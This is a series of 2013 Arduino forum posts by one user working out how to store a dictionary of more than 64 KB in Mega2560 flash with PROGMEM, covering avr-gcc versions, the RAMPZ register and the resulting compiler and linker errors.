There is a real 64k boundary for data today. Note that code is not as limited. The vector long jump table (which I guess is called a "trampoline table" in AVR speak) consists of 32 bit words and so could easily address much more than the 256k in the Mega. However, data access is limited by 16-bit pointer addressing, so the largest chunk is 64k. Now, there is a great exception to this. By concatenating bits from another register (RAMPZ) you can effectively create a 24bit pointer for data, and this is done, partially in some asm code available in multiple libraries out there. At the moment, on the version of the IDE we have, though you can specify multiple 64k byte clumps, you can't cross that boundary on any one array or data structure.
Future versions of avr-gcc seem to address this. Particularly, it appears that in 4.7.2 the compiler/linker is happy with larger-than-64k global defs. And let me say here - it's global defs that are not-changing that we are talking about at all times, because it goes into flash. If you say"
Code:
volatile int xyz = 123;
That gets put into RAM and is globally defined for all your code/ISRs. This is not what I'm saying. If I say
Code:
volatile int xyz PROGMEM_blahblah = 123;
The "volatile" piece is not particularly useful, far as I can tell. By specifying PROGMEM_... you're putting the data into flash, and as such, it has to be globally accessible because you can't put PROGMEM data into local vars. And as it's not changable this would be just as effective and apparently does exactly the same thing:
Code:
int xyz PROGMEM_blahblah = 123;
The problem with getting things to compile when you've got more than 64k in one chunk (and it will compile under certain circumstances) is that the rest of the system has no clue how to handle it because the ptr to the globals is only 16bits and theres nothing upon nothing you can do about that. So you wind up with linker errors, and errors that show up in other places - in code you had nothing to do with. This is a sign of badness, and the signal that you need to accept your 64k limitation with happiness and move on. Because it will be solved at some point.
In the version of avr-gcc available in the Ar1.0.3 (I believe it's 4.3.2) distribution, the compiler balks at "certain" declarations/structures which when initialized reach over 64k. And this is a key point - most of the problems surface in the "initialization" of defined vars, and not in the definition itself.
By the way, you can happily define/allocate empty vars to your hearts content. This is a red herring, though, I have found. In a lot of the tests run here, and also ones I've tried, you can play various games to get the compiler to NOT optimize away unused/uninitialized space. But the results are variable.
First, let me indicate we are talking about data in Flash. For all intent and purposes, data in Flash may as well be data in a ROM. Yes, I know there are ways to modify it during runtime, but that goes beyond what I have tried here.
As the flash data is essentially in a ROM, it is not unreasonable to expect that you would know what it was apriori. That is - you're going to burn it into flash, so you're certain what the data is. Therefore, all vars/data going into flash are known ahead of time and the compilers/linkers presume as much. This is an important point, and also one which is the source of a lot of pain. You can do the following in your code:
Code:
const char abc[] PROGMEM_blahBlah = "abc"; // PROGMEM_blahblah to be explained
And the abc will become abc[4] after compilation - that is, three chars 'a','b','c' and a trailing null '\0'. Please note that the compilers presume that declaration/initialization is intended to define a string. You don't get to come back later and say - hey, there's only 3 chars I didn't mean for it to be a null-terminated string. Too bad. The compiler is helping you. If you want a 3 char array you say:
Code:
const char abc[3] PROGMEM_blahBlah = 'a','b','c';
and you get that. But in the determination of your memory usage you may be thrown off when the compiler tries to help you by adding another byte. In addition, when you're doing pointer arithmetic, you can't (always) address things in various parts of flash. For instance, depending on how you organized things this gives you garbage:
Code:
int aa[3] PROGMEM_yak= 1,2,3;
int fetchedInt;
for(int x=0;x,3;x++){
fetchedInt = pgm_read_word_far(&aa[x]);
printf("%d=%d\n",x,fetchedInt);
}
where this will work
Code:
int aa[3] PROGMEM_yak= 1,2,3;
int a,b,c;
a = pgm_read_word(&aa[1]);
b = pgm_read_word(&aa[2]);
c = pgm_read_word(&aa[3]);
printf("a=%d,b=%d,c=%d\n",a,b,c);
Now in my app, I am defining 10,000 words in a way I can access them. I have tried several methods. I have tried putting them in a struct like this:
Code:
typedef struct {
const char a[2];
const char aardvark[9];
//... etc 10k words
} words;
const words dictionary PROGMEM_blahblah = {
{"a"}, {"aardvark"},//etc, 10000 initializers};
And that will compile just with the current version of avr-gcc. However, it generates an error on versions 4.6.2 and 4.7.2 that say something to the effect of "internal error: report a bug ..."
Doing this
Code:
typedef struct {
const char a[2];
const char aardvark[9];
//... etc 10k words
} words;
const words dictionary PROGMEM_blahblah = {
.a="a",
.aardvark="aardvark",
//etc, 10000 initializers};
Will not compile on the current Arduino IDE but will compile on version 4.6.2 and v4.7.2.
I inevitably settled on a different means - and this isn't entirely debugged. I'm still having trouble with the flash memory sections, but I did the following:
Code:
const char apple[6] PROGMEM_yadda="apple";
const char bear[5] PROGMEM_yadda="bear";
// etc. etc. etc. 10000 words
const char* dictionary[10000] PROGMEM_yadda+1 ={apple, bear, //etc etc
The idea is that 64k of dictionary data is in a chunk of flash designated by the attribute "PROGMEM_yadda" and an array of pointers to that data is in a chunk of memory called "PROGMEM_yadda+1" (it may be obvious to most - but please don't try to create code with PROGMEM_yadda... that's just an example ) That compiles and links peachily.
Now - PROGMEM what I learned about PROGMEM is that as an attribute it specifies putting data into flash. Using PROGMEM is a multi-step process. You have to put it into your code, explicitly. But you also have to change the linker script to understand what you mean by that attribute. And then retrieving data stored via PROGMEM requires using accessors of the form
Code:
pgm_read_word_far(&myArray[i]);
...continued
6
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 02, 2013, 04:53:45 pm
My problem appears to be this problem:
Quote
..it looks like the version of g++ used by Arduino will fail whenever the global constructors get pushed beyond the 64k limit, because the global constructor table is only 16bits wide and the code uses ijmp to access it...
Found here:
I'm compiling avr-gcc-4.7.2 right now just for grins, and I will try building outside the Arduino IDE environment to see if I can get it to load.
Ah, I had long forgotten the joys of code.
7
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 01, 2013, 04:48:52 pm
Thanks Nick.
Yes, absolutely, a more intelligent data structure would be more compact and faster too.
Of course, even then there is the bald-faced challenge of trying to use up the whole 256k of the Mega....and once solved I'll also use tries and get even more packed in there!!!
Cheers
Joe
8
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 01, 2013, 02:55:27 pm
Ok, an experiments with Lefty's code. I generated some exhaustive initialization just to see what would happen.
Code:
= 3000; // value to mostly fill available flash capacity
long myInts
long myInts
//...
//...up to
long myInts9[arraysize]PROGMEM={//etc I've noticed is that if the sketch size goes over 128K I start getting errors of the form:
warning: internal error: out of range error...
That is, if I add a an additional array of [arraysize] longs where arraysize = 3000, bringing the number up to 11 arrays, each of 3000 long elements = 4*11*3000 = 132K bytes (then add the rest of the sketch ) I start getting that out of range error called on various libs. For instance the first place it shows up is as an out of range error on the do_random func random.o. If I comment out the call to random, it shows up in Hardware Serial.
If I stick to 10 initialized arrays the sketch size is 124,996 ( = 4*10*3000 + rest of sketch). No problems compiling/linking.
Now interestingly. suppose instead of long int I initialize each of the myInts array to 3000 4 byte null terminated strings thus:
Code:
char* myInts9[arraysize] PROGMEM ={"abc\0","abc\0","abc\0",//..etc for 3000 initializers
For 10 initialized arrays of 3000 four-byte-strings the IDE reports a sketch size of 64,646 bytes out of a 258,048 byte maximum. The same sketch initialized to longs is reported as 124,996.
For 20 initialized arrays of 3000 four-byte strings the IDE reports
arduino-1.0.3\hardware\arduino\cores\arduino/main.cpp:11: warning: internal error: out of range error
Binary sketch size: 136,682 bytes (of a 258,048 byte maximum)
If I take out 1 array I get no errors and
Binary sketch size: 130,646 bytes (of a 258,048 byte maximum)
I have not yet tried to load and run these sketches.
Cheers,
Joe
9
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 01, 2013, 01:00:52 pm
Though slightly inconvenient that sounds vastly rational. In any case the dictionary I am trying to store is a static resource, so getting it set up correctly a-priori is no problem. Once it is set up, I won't change it. Hopefully in the future this will only get easier.
I will try it.
Joe
10
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 01, 2013, 12:37:16 pm
Thanks for the code, Pyro.
That seems to definitely work to access the data in Flash.
The issue I seem to be facing from the outset happens where the declaration is:
prog_char abc[] = "hello world";
In my code, I am trying to create 10,000 prog_char var[]s. The size of all the strings in 10,000 declarations combined is 75k. There would have to be at least 17 bits of addressing to accomodate that. Fortunately, it appears from literally all of the documentation that it is possible to do this on the ATMega2560 chip set through the use of the RAMPZ register.
However, when I try to compile/link the code that contains the 10,000 lines of declarations, each of which is unique and looks like - prog_char foo[] = "bar"; -
the compiler/linker stage balks in the Arduino IDE. The error I get is that those declarations are too large to fit in 2 bytes of addressing.
Well, sure. It's just math and we all know you can't address 75K of data with only 16 bits. But there should be flags set in the appropriate places (like --relax in the linker) and defines for the compiler that make sure the addressing is set up correctly.
The issue I'm having is getting the data into the high memory in the first place. I'm absolutely certain that once it is there, we can use various functionality suggested kindly here to read it.
Thanks so much for putting up with my blather.
Joe
11
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 01, 2013, 01:25:01 am
Hi and thank you all for the suggestions.
The suggestion to look into "morepgmspace.h" led to the AVR C runtime lib website and Carlos's code. It looks very instructive, though it is mostly runtime stuff (well, sure, of course). Now I don't know enough about this platform to understand if perhaps that code suggests you can load the FLASH dynamically - I thot that wasn't possible. Or perhaps the way I should read it is that I need to somehow write my declaration code so it looks like it's being dynamically written, but actually, it's being compiled and linked and uploaded like any normal sketch.
There is actually a bug fix update/change to pgmspace that was uploaded as recently as a few days ago. In that version, as opposed to the one in the 1.0.3 distribution, they extern a whole bunch of long address functions. They also deprecate a whole load of types.
Hemmerling's page says that for chips that have over 64k of flash - that the normal 16bit pointer scheme (plus RAMPZ, etc) allows addressing to 128k in 2 64k chunks.
I did indeed try to split my
const char* array[] {};
into two separate chunks, though it still thinks I'm trying to address flash beyond 64k with only the 16bit ptr, and the assembler balks.
I'm wondering if there isn't a define somewhere that I'm not taking advantage of. For instance - could it be that selecting "Mega2560 or Mega ADK" somehow isn't getting the right defines set somewhere so it isn't taking advantage of RAMPZ, or perhaps I'm just declaring stuff in a way that's braindead.
Most likely, I'm doing something braindead, and I expect there's a simple newbie mistake in my process that once I figure out will have me slapping my forehead into the wall... Discussion of how to address and read flash over 64k is everywhere. But how to write it at compile/link/load time is not.
That makes me think it should just happen easily, and I'm missing something obvious (as usual).
Thanks for the code snippets. I will try all avenues and report back if I have a breakthrough.
Best
Joe
12
Using Arduino
/
Programming Questions
/
Just a newby asking the 64k question again - Arduino Mega2560
on: January 31, 2013, 06:12:35 pm
Hi all and thanks in advance,
For the past week I have been scouring the web and this site with great interest in trying to answer the perennial question - can you store an array in PROGMEM that is larger than 64k bytes on the Mega2560?
My application is that I want to store a dictionary of 10,000 words in PROGMEM statically through compilation in the usual way prescribed here and in other places:
Code:
#include <avr/pgmspace.h>
const char* a_dict PROGMEM = "a";
const char* aa_dict PROGMEM ="aa";
const char* aaa_dict PROGMEM ="aaa";
const char* aaron_dict PROGMEM ="aaron";
const char* ab_dict PROGMEM ="ab";
const char* abandoned_dict PROGMEM ="abandoned";
const char* abc_dict PROGMEM ="abc";
//.
//.
//.
//etc 10,000 lines of words. The total size of all the characters+null termination bytes in all the words is 75.5k. ...then...
const char* dictionary[] PROGMEM = {a_dict, aa_dict,aaa_dict,aaron_dict,ab_dict,abandoned_dict,abc_dict // 10000 char* vars worth
};
//then some way to access the dictionary yet to be decided
void setup(){}
void loop(){
char* x; //a place holder for a recovered string
int index; //some sort of index
//something like strcpy_PF(x, (char*)pgm_read_word_far(&(dictionary[index])));
// yadda yadda, do something with x
}
The problem I run into is the thing will not compile. I get an assembler error saying that "Error: value of 68731 is too large to fit into 2 bytes at xyz" which of course is true for any number bigger than 2^16
So I'm thinking there must be some secret incantation to get it to be understood that I need addressing to somehow be far/long/etc...somehow at least 1 bit more than 16 bits of addressing. It looks like by reading the various .h files and .cpp files in the avr libs that there is a register called RAMPZ that is used in the extension of the addressing to allow addressing more than 64K of flash. But how to get that to happen?
In all my reading I find a lot of info on how to access data placed above the 64k boundary - but nobody says how to get the compiler to put it up there in the first place. Is there a parameter? Is there a typedef I'm missing? Or - does the compiler just simply do it for you when you set things up correctly.
Should I divide up my dictionary of words into 2 pieces, each less than 64k? Then perhaps I could do something like __attribute__((section(".someothersection"))); to get it to go in some other place?
Any guidance would be muchly appreciated.
Quite humbly,
Joe
Pages: [
1
]
|
SMF © 2013, Simple Machines
Newsletter
©2014 Arduino | http://forum.arduino.cc/index.php?action=profile;u=165592;sa=showPosts | CC-MAIN-2014-15 | refinedweb | 5,170 | 69.52 |
Hack the Box Write-up #5: TartarSauce
In this write-up we’re looking at solving the retired machine “TartarSauce” from Hack The Box.
After spending some time on the hosted web applications, we’ll eventually get the first foothold via an outdated Wordpress plugin. From there we can upgrade to a user shell by abusing the
tar command. Eventually, we get root by abusing
tar once more, but this time as part of a backup script and in a bit more involved way.
Recon and Enumeration
As usual, we run our initial nmap scan
nmap -sV -sC -oN nmap/init 10.10.10.88
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 5 disallowed entries | /webservices/tar/tar/source/ | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ |_/webservices/developmental/ /webservices/phpmyadmin/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Landing Page
While only getting back one open port, the listed entries in the robots.txt file do look promising.
Note that entries in the robots.txt file don’t “hide” pages/directories. While they indicate to crawlers what you want and don’t want to have indexed, they are a) only an advisory and not a technically imposed rule, and b) can give an attacker a first idea of what you don’t want exposed or have removed from public search engines.
Let’s start by visiting the root path of 10.10.10.88:
Nothing interesting to see here except some ascii art and a little troll at the end of the page source after hundreds of line feeds:
<!--Carry on, nothing to see here :D-->.
Let’s start a directory brute-force of
/ and
/webservices while going through the list of disallowed robots.txt entries:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u
Out of the five paths listed in robots.txt, only
/webservices/monstra-3.0.4/ is available.
Monstra is a Content Management System written in PHP, apparently not further developed anymore and the version it displays has several known security vulnerabilities. Doing a
searchsploit monstra in Kali shows (Authenticated) Arbitrary File Upload / Remote Code Execution as the most promising weakness related to this version.
As it requires prior authentication, let’s go over to and attempt a login with common credentials.
admin and
admin as user/password works right off the bat and we’re inside the admin interface.
Examining the potential exploit (
searchsploit -x 43348), it looks like a simple file upload could give us remote code execution via PHP. Trying it out, however, we quickly find the upload functionality does not work for any file, and we can see that doing any kind of modification in the admin panel leads to errors as well (e.g. modifying a template).
The vulnerability does not seem to be exploitable, even though in theory it should be. I like this, because it reflects a very common situation in real life, where vulnerabilities exist, but cannot be exploited due to the presence of certain configurations or just lucky circumstances.
But, looking at the gobuster results from the directory brute-force started earlier, we have found another promising candidate:
/webservices/wp. It shows a rather empty wordpress installation, but as abandoned software often that lets you in, let’s start enumerating it.
Having a look at Wordpress’ default directories, we see that browsing them is a bit tedious as it seems the base url of the site is misconfigured (missing a slash after
http:/).
While we could manually correct all HTTP requests through an intercepting proxy, there’s a nice trick to do it automatically in Burp.
Going to Options in the Proxy tab, we can add a rule under Match and Replace and tell it to replace
GET /10.10.10.88/webservices in the request header with
GET /webservices. Similarly, we could do this for other methods and headers as well.
Now we can browse the site regularly through the Burp proxy.
Unfortunately, we’re not lucky with weak credentials this time, and even notice a delay in processing the login requests to prevent brute-forcing.
As Wordpress security is often compromised using third-party plugins, let’s have a look at WPScan to enumerate plugins:
wpscan --url -e ap --plugins-detection aggressive
(Using aggressive detection as passive/mixed did not yield results)
[i] Plugin(s) Identified: [+] akismet | Location: | Last Updated: 2019-11-13T20:46:00.000Z | Readme: | [!] The version is out of date, the latest version is 4.1.3 | | Found By: Known Locations (Aggressive Detection) | -, status: 200 | | Version: 4.0.3 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - [+] brute-force-login-protection | Location: | Latest Version: 1.5.3 (up to date) | Last Updated: 2017-06-29T10:39:00.000Z | Readme: | | Found By: Known Locations (Aggressive Detection) | -, status: 403 | | Version: 1.5.3 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - [+] gwolle-gb | Location: | Last Updated: 2019-10-25T15:26:00.000Z | Readme: | [!] The version is out of date, the latest version is 3.1.7 | | Found By: Known Locations (Aggressive Detection) | -, status: 200 | | Version: 2.3.10 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | -
Going through these and researching past vulnerabilities, we find a potential Remote File Inclusion vulnerability in gwolle-gb, albeit for a different version.
As it’s a very easy exploit, let’s try it anyway.
First shell
We create a file
wp-load.php in a directory on our machine and add code for a PHP reverse shell. I chose the shell from SecLists, present at
seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php.
After changing the IP to our own and port to one of choice, we can launch a webserver from the directory of our
wp-load.php file (
python3 -m http.server 80), spin up a netcat listener (
nc -lvnp <port>), and then navigate to<our IP>/.
It works and we get our first shell as
www-data. The version information in the readme.txt that WPScan read was thus false information.
Privilege escalation to user
To get a nicer shell, let’s quickly do a
python3 -c 'import pty; pty.spawn("/bin/bash")' followed by backgrounding,
stty raw -echo and foregrounding again (check the blog post “Upgrading Simple Shells to Fully Interactive TTYs” at blog.ropnop.com for details about this trick).
One of the first things to check once we get an initial foothold is – amongst other things – see if we can execute commands as another user. In this case, we can:
www-data@TartarSauce:/$ sudo -l Matching Defaults entries for www-data on TartarSauce: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on TartarSauce: (onuma) NOPASSWD: /bin/tar
Being able to run
tar as the user
onuma probably means we can easily escalate to that user:
$ sudo -u onuma /bin/tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"' $ id uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
The reason this works is that
-I allows us to specify a custom compression program (
-I ==
--use-compress-program). It is not the only method of abusing
tar for privilege escalation, though. Have a look at the gtfobins page for tar.
Getting root
Having our new permission, we can run an enumeration script to get an overview of the system. We can host LinEnum on our machine (e.g.
python3 -m http.server 80) and then load it and pipe it into bash in the
onuma shell:
curl | bash
Amongst other things we see a couple of files related to some kind of backup and more specifally a systemd timer:
[-] Systemd timers: NEXT LEFT LAST PASSED UNIT ACTIVATES Sun 2020-02-09 17:08:42 EST 3min 24s left Sun 2020-02-09 17:03:42 EST 1min 35s ago backuperer.timer backuperer.service
There are also a few other (false?) hints, e.g. a comment in
.bashrc:
# add alias so i don't have to type root's super long password everytime i wanna switch to root :D"
I couldn’t find any clue to these, so let’s go on with finding out more about the
backuperer.service and the related timer.
systemd timers are a way to start services based on time, similar to
cron. We can find the configuration of “backuperer” in
/etc/systemd/system/multi-user.target.wants/backuperer.timer or
/lib/systemd/system/backuperer.timer, respectively.
backuperer.timer:
[Unit] Description=Runs backuperer every 5 mins [Timer] # Time to wait after booting before we run first time OnBootSec=5min # Time between running each consecutive time OnUnitActiveSec=5min Unit=backuperer.service [Install] WantedBy=multi-user.target
And the service backuperer.service in
/lib/systemd/system/backuperer.service:
[Unit] Description=Backuperer [Service] ExecStart=/usr/sbin/backuperer
And, finally, the contents of
/usr/sbin/backuperer:
#!/bin/bash # [...] # Set Vars Here basedir=/var/www/html bkpdir=/var/backups tmpdir=/var/tmp testmsg=$bkpdir/onuma_backup_test.txt errormsg=$bkpdir/onuma_backup_error.txt tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1) check=$tmpdir/check # formatting printbdr() { for n in $(seq 72); do /usr/bin/printf $"-"; done } bdr=$(printbdr) # Added a test file to let us see when the last backup was run /usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg # Cleanup from last time. /bin/rm -rf $tmpdir/.* $check # Backup onuma website dev files. /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir & # Added delay to wait for backup to complete if large files get added. /bin/sleep 30 # Test the backup integrity integrity_chk() { /usr/bin/diff -r $basedir $check$basedir } /bin/mkdir $check /bin/tar -zxvf $tmpfile -C $check if [[ $(integrity_chk) ]] then # Report errors so the dev can investigate the issue. /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg integrity_chk >> $errormsg exit 2 else # Clean up and save archive to the bkpdir. /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak /bin/rm -rf $check .* exit 0 fi
We can see that the script does – more or less – the following:
- Removes dot files from
/var/tmp, plus the
/var/tmp/checkfolder.
- Zips/archives the contents of
/var/www/htmlas user onuma into a file in
/var/tmpwith a random name beginning with a dot.
- Sleeps for 30 seconds
- Creates the directory
/var/tmp/check
- Extracts the previously archived contents as root into the
/var/tmp/checkdirectory
- Performs a
diffagainst
/var/www/htmlvs.
/var/tmp/check/var/www/html
- If the check in 6. reports differences, it just writes an error log, but leaves the files. If no differences are reported or if the diff command errors out (as, for example, the directory doesn’t exit), it moves the archive file into
/var/backupsand then removes the
/var/tmp/checkdirectory and dot file.
If we are able to replace the tar gzipped file with our own malicious one in the timeframe of step 3 (sleep 30), include in our own tar.gz an executable with setuid bit set and owner root, plus leave the directory structure intact (as we want a successful diff (no error) that reports differences),
tar should extract (and keep permissions/attributes) and the script should not move/delete any file. After that we could then enter the check directory and execute our file to get a root shell. Let’s give it a shot:
- Create a simple C program on our machine that will spawn a bash shell (and keep effective user id):
#include <stdio.h> #include <unistd.h> int main (void) { char *argv[] = { "/bin/bash", "-p", NULL }; execve(argv[0], argv, NULL); }
Compile for the target machine:
gcc -m32 shell.c -o shell
Add the setuid:
chmod +s shell(owner is already root (
0) as we’re on a Kali machine)
Make the directory structure (still on our machine):
mkdir -p var/www/html
Move our executable into the directory:
mv shell var/www/html/
Tar the whole thing up:
tar -zcvf shell.tar.gz var/
Now that we have our
shell.tar.gz file, we can transfer it over to the target machine (e.g. via a HTTP server like above) and place it into, e.g.
/var/tmp.
With
systemctl list-timers, we can see when our window of opportunity will open (as soon as LEFT goes to 0):
NEXT LEFT LAST PASSED UNIT ACTIVATE Mon 2020-02-10 10:52:38 EST 56s left Mon 2020-02-10 10:47:38 EST 4min 3s ago backuperer.timer backuper
Once the backuperer script runs and we can see the temp file in
/var/tmp, we’ll replace it with our shell.tar.gz (
cp shell.tar.gz .<random name>). A few seconds later – if everything went fine, we should find the check folder with our setuid binary in it.
Now we still have a couple of minutes left to execute the binary in
/var/tmp/check/var/www/html, which gives us a root bash shell:
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls shell onuma@TartarSauce:/var/tmp/check/var/www/html$ ./shell bash-4.3# id uid=1000(onuma) gid=1000(onuma) euid=0(root) egid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(onuma) bash-4.3# whoami root
Cheers!
I hope you’ve enjoyed this write-up. If you have any questions, did it another way or have something else to say, feel free to leave a comment. I’m always happy to learn new things. You can also check out the other write-ups. | https://davidhamann.de/2020/02/10/htb-writeup-tartarsauce/ | CC-MAIN-2020-10 | refinedweb | 2,322 | 54.93 |
Details
Description
Issue Links
- is cloned by
-
- is related to
DERBY-4376 Simple select runs forever
- Closed
- relates to
DERBY-3061 Wrong results from query with two conjuncts
- Closed
DERBY-2500 Assertion failure preparing query with AND and OR in where clause
- Closed
DERBY-2740 LIKE parameter marker combined with index multi-probing leads to ASSERT failure with sane jars, wrong results with insane jars.
- Closed
DERBY-3253 NullPointer Exception (NPE) from query with IN predicate containing two values and joining a view with a large table. ERROR 38000: The exception 'java.lang.NullPointerException' was thrown while evaluating an expression.
- Closed
DERBY-3279 Derby 10.3.X ignores ORDER BY DESC when target column has an index and is used in an OR clause or an IN list.
- Closed
DERBY-6045 in list multi-probe by primary key not chosen on tables with >256 rows
- Closed
DERBY-6226 enhance optmizer to use multiple probes into multiple indexes to satisfy OR queries on different columns.
- Open
DERBY-6784 change optimizer to choose in list multiprobe more often
- Open
Activity
- All
- Work Log
- History
- Activity
- Transitions
I have evidence (presented below) that the query optimizer is making some very poor choices when deciding how to make use of the available indexes. Unfortunately, this is making Derby unusable for the application I'm working on.
Clearly, the Derby engine is fundamentally capable of executing queries in a sensible amount of time, but the query optimizer appears to get confused if there are several indexes to choose from and multiple references to the same column in the WHERE clause.
In my previous, comment I gave details of simple example that demonstrated the problem. To recap, I am executing variants of the following SQL against a relatively simple table:
SELECT ObjectId, SUM(WordLocation) AS Score
FROM tblSearchDictionary
WHERE Word = 'CONTACT' OR Word = 'ADD'
GROUP BY ObjectId;
It makes no difference to the query performance or query plan if the WHERE clause is as above, or is re-written as:
WHERE Word IN ('CONTACT', 'ADD')
– ORIGINAL RESULTS: –
The timings with the schema described in my previous comment are:
Matching one term: ~200ms avg.
Matching two terms: ~10000ms avg.
The "matching one term" timings are with the following WHERE clause:
WHERE Word = 'CONTACT'
(searching just for 'ADD' gives similar timings).
The "matching two terms" timings are with the following WHERE clause:
WHERE Word = 'CONTACT' OR Word = 'ADD'
The query plans for these timings can be found in my previous comment.
With some suggestions from the derby-users list, I have attempted to redefine the indexes on the table to see if that will have any effect on the choices made by the query planner.
Dropping all the column indexes and then reordering the unique constraint so that the most varying column is first, and the least varying last, caused the query planner to change its plan to use the index backing the unique constraint to match the terms.
DROP INDEX TBLSEARCHDICTIONARYOBJECTID;
DROP INDEX TBLSEARCHDICTIONARYOBJECTTYPE;
DROP INDEX TBLSEARCHDICTIONARYWORD;
DROP INDEX TBLSEARCHDICTIONARYWORDLOCATION;
ALTER TABLE TBLSEARCHDICTIONARY DROP UNIQUE CONSd0e222
ALTER TABLE TBLSEARCHDICTIONARY ADD CONSTRAINT CONSd0e222 UNIQUE
(ObjectId,Word,WordLocation,ObjectType);
However from the results you can see that the search for a single term suffered a big loss in performance.
– RESULTS WITH OPTIMIZED CONSTRAINT: –
Matching one term: ~4000ms avg.
Matching two terms: ~600ms avg.
I have attached the relevant query plans for each of these results.
This is a very surprising result: matching one term performs far worse than matching two.
In an attempt to remedy problem of the poor single term performance, I re-introduced the index to the Word column with the following schema change:
CREATE INDEX tblSearchDictionaryWord ON tblSearchDictionary (Word );
– RESULTS WITH OPTIMIZED CONSTRAINT AND INDEX ON WORD FIELD: –
Matching one term: ~200ms avg.
Matching two terms: ~4500 ms avg.
Again, I have attached the relevant query plans.
Although the additional index is used in the single term query, it can be seen that adding the additional index has the effect of causing the planner to get confused about which indexes to use for the two term case. The plan here shows an index scan of both indexes, resulting in an average time seven times worse than before.
I should add here that replacing the WHERE OR clause for the two term query with an IN() produces exactly the same plan and results, which is what one would expect based on the Derby documentation's description of how the optimizer re-writes WHERE OR clauses.
It seems to me that the optimizer is broken when processing WHERE clauses with OR and WHERE clauses with IN. The engine is obviously capable of executing my example in a reasonable time, but the planner's choices let it down. This causes significant problems in large applications with many complex queries, particularly where the number of terms in an IN clause varies, as it then becomes almost impossible to construct queries that execute with reliably acceptable performance.
It may be interesting to note that the application I'm working on also can also use Mckoi or SQL Server 2000. Both the single and double term searches execute with acceptable performance with both of those database engines.
–
Kevin Horetwo terms in a table that contains only the revised unique index. two terms in a table that contains only the revised unique index.
Is it possible to contribute a test case with data that I can quickly setup to try on my machine? Make sure your data is sharable (to the whole world!). I do see some numbers here that I don't understand how it is possible, especially the case of two terms being faster than one. I would like to confirm if because of possible page cache and/or other suspects I have.
I'll try to schedule some time for one of our engineers to contribute a test case with data. We're in the middle of a release cycle right now, so it might not be done straight away. Thank you for your interest.
I spent much of last week tracking down a performance problem in an application that I'm working on, and it turned out to be described here.
I developed a test application (that I will attach) that explores different ways of doing essentially this query:
SELECT * FROM myTable WHERE foreignKeyColumn IN (?, ..., ?)
We tried the following strategies:
Literals - 1 query, using WHERE column IN ('literal1', ..., 'literalN')
Literal - N queries, using WHERE column = 'literal[i]
Markers - 1 query, using WHERE column IN (?, ..., ?)
Marker - N queries, using WHERE column = ?
TempTable - 1 query, store parameters in a temp table, use nested select, then delete parameters
ScratchPad - 1 query, store parameters in a table, use nested select, then delete parameters
ScrSavepoint - 1 query, set savepoint, store parameters in a table, use nested select, then rollback savepoint
We were astonished to find that converting the query to:
SELECT * FROM myTable WHERE foreignKeyColumn = ?
And repeating that query N times was by far the best performer out of 7 different strategies I tried. (This is what I call the Marker strategy above.)
Here are the results for a table with 100,000 rows in it, and then after that for 1,000,000 rows:
(Note: this table is tab delimited, for easy importing into Excel. I'll also attach this data.)
Literals Literal Markers Marker TempTable ScratchPad ScrSavepoint
ID Count Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms Total ms Avg ms
1 20 20 10 10 10 10 0 0 1232 1232 1132 1132 1022 1022
2 881 440 20 10 450 225 0 0 1022 511 1041 520 1042 521
3 1051 350 30 10 2794 931 0 0 1022 340 1022 340 1012 337
4 1012 253 40 10 2013 503 0 0 1032 258 1002 250 1202 300
5 1132 226 40 8 2053 410 0 0 1032 206 1022 204 1042 208
6 1042 173 50 8 1523 253 0 0 1012 168 1022 170 1051 175
7 1132 161 60 8 3145 449 0 0 1022 146 1032 147 1112 158
8 1102 137 60 7 3034 379 10 1 1062 132 1202 150 1082 135
9 1102 122 60 6 2965 329 0 0 1142 126 1151 127 992 110
10 1112 111 70 7 3526 352 0 0 1022 102 1052 105 1062 106
20 1142 57 120 6 3746 187 10 0 1022 51 1112 55 1232 61
30 1317 43 195 6 4117 137 10 0 1022 34 1082 36 1072 35
40 1252 31 250 6 4417 110 20 0 1022 25 1091 27 1282 32
50 1292 25 320 6 4777 95 20 0 1062 21 1052 21 1052 21
60 1327 22 350 5 5068 84 20 0 1062 17 1082 18 1112 18
70 1332 19 415 5 5504 78 30 0 1042 14 1142 16 1081 15
80 1327 16 471 5 5769 72 40 0 1041 13 1052 13 1277 15
90 1362 15 481 5 6330 70 40 0 1052 11 1152 12 1092 12
100 1372 13 536 5 6460 64 40 0 1283 12 1092 10 1202 12
=============================================================================================================================
